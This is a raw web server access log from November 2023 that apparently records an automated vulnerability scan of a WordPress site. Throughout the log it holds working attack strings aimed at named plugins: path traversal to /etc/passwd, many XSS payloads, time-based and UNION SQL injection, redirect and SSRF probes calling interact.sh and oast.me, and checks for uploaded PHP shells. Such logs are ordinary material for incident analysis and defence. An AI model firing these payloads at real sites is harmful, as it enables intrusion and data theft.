Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 370 2023-11-09 23:38:27 103.153.214.94 GET / patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 368 2023-11-09 23:38:59 103.153.214.94 GET /tour-list/ keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 363 2023-11-09 23:40:13 103.153.214.94 GET /properties/ keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/2XwZL4aX9p2mDVFaZs9BSwQOD26/)%3B%2F%2F 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 370 2023-11-09 23:40:20 103.153.214.94 GET /wp-admin/admin.php page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg== 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 363 2023-11-09 23:40:50 103.153.214.94 POST /wp-login.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 366 2023-11-09 23:41:06 103.153.214.94 POST /wp-comments-post.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 362 2023-11-09 23:41:06 103.153.214.94 GET /wp-admin/admin.php page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 362 2023-11-09 23:41:09 103.153.214.94 GET /wp-content/plugins/imagements/images/2xwzlf13g89qsorb2bulxulqtxf.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 367 2023-11-09 23:41:35 103.153.214.94 GET /wp-admin/admin.php page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 362 2023-11-09 23:42:23 103.153.214.94 GET /wp-admin/admin.php page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 367 2023-11-09 23:42:23 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 362 2023-11-09 23:43:30 103.153.214.94 GET /ads/www/delivery/lg.php dest=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 1109 2023-11-09 23:43:36 103.153.214.94 GET /adserve/www/delivery/lg.php dest=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 364 2023-11-09 23:43:38 103.153.214.94 GET /adserver/www/delivery/lg.php dest=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 366 2023-11-09 23:43:40 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 360 2023-11-09 23:43:41 103.153.214.94 GET /openx/www/delivery/lg.php dest=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 361 2023-11-09 23:43:46 103.153.214.94 GET /revive/www/delivery/lg.php dest=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 363 2023-11-09 23:43:49 103.153.214.94 GET /www/delivery/lg.php dest=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 367 2023-11-09 23:44:08 103.153.214.94 GET /index.php page=acymailing_front&ctrl=frontusers&ctrl=frontusers&noheader=1&user[email]=example@mail.com&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 361 2023-11-09 23:45:17 103.153.214.94 GET /wp-admin/admin-ajax.php action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)// 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 1023 2023-11-09 23:45:52 103.153.214.94 GET /giveaway/mygiveaways/ share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 365 2023-11-09 23:45:52 103.153.214.94 POST /wp-admin/admin-ajax.php action=uploadFontIcon 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 2322 2023-11-09 23:45:56 103.153.214.94 GET /wp-content/uploads/kaswara/fonts_icon/yioakt/la.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 370 2023-11-09 23:46:15 103.153.214.94 GET / post_type=post&s=%22%3E%3Cscript%3Ealert(/2XwZKM9dEffvyTzh9LbytmcI10E/)%3C/script%3E+ 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 366 2023-11-09 23:46:36 103.153.214.94 GET /listing/ listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 363 2023-11-09 23:47:58 103.153.214.94 GET /car1/estimateresult/result s&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 364 2023-11-09 23:48:18 103.153.214.94 POST / ajax-request=jnews 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 369 2023-11-09 23:49:29 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 1489 2023-11-09 23:49:48 103.153.214.94 GET /wp-admin/admin-ajax.php action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 368 2023-11-09 23:50:02 103.153.214.94 GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 363 2023-11-09 23:50:33 103.153.214.94 GET / ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 368 2023-11-09 23:50:49 103.153.214.94 GET /community/ foro=signin&redirect_to=https://interact.sh/ 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 1106 2023-11-09 23:50:49 103.153.214.94 GET /listings/ search_title&location&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 364 2023-11-09 23:51:19 103.153.214.94 GET / author=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 368 2023-11-09 23:51:43 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 1843 2023-11-09 23:51:45 103.153.214.94 GET /wp-content/plugins/wp-statistics/readme.txt - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 363 2023-11-09 23:51:51 103.153.214.94 GET /wp-admin/admin.php page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 368 2023-11-09 23:53:45 103.153.214.94 GET /wp1/home-18/ qtproxycall=https://oast.me 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 378 2023-11-09 23:56:18 103.153.214.94 GET / cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 370 2023-11-09 23:56:59 103.153.214.94 GET /titan-framework/lib/iframe-font-preview.php font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 363 2023-11-09 23:57:06 103.153.214.94 GET /titan-framework/lib/iframe-font-preview.php font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 1104 2023-11-09 23:57:10 103.153.214.94 GET /titan-framework/lib/iframe-font-preview.php font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 403 2023-11-09 23:58:10 103.153.214.94 GET /wp-content/plugins/marmoset-viewer/mviewer.php id=http://</script><svg/onload=alert(%272XwZL6D0J8bIq7ELc68h9ZKIUFX%27)> 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 376 2023-11-09 23:58:14 103.153.214.94 GET /wp-content/plugins/marmoset-viewer/mviewer.php id=1+http://a.com%27);alert(/2XwZL6D0J8bIq7ELc68h9ZKIUFX/);marmoset.embed(%27a 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 364 2023-11-09 23:58:45 103.153.214.94 GET /index.php rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20- 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 389 2023-11-09 23:59:01 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 363 2023-11-09 23:59:07 103.153.214.94 GET /wp-content/uploads/workreap-temp/2XwZKEjBRtTyyDN1jIf1TO9i4ub.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 366 2023-11-09 23:59:22 103.153.214.94 POST /wp-json/pie/v1/login - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 359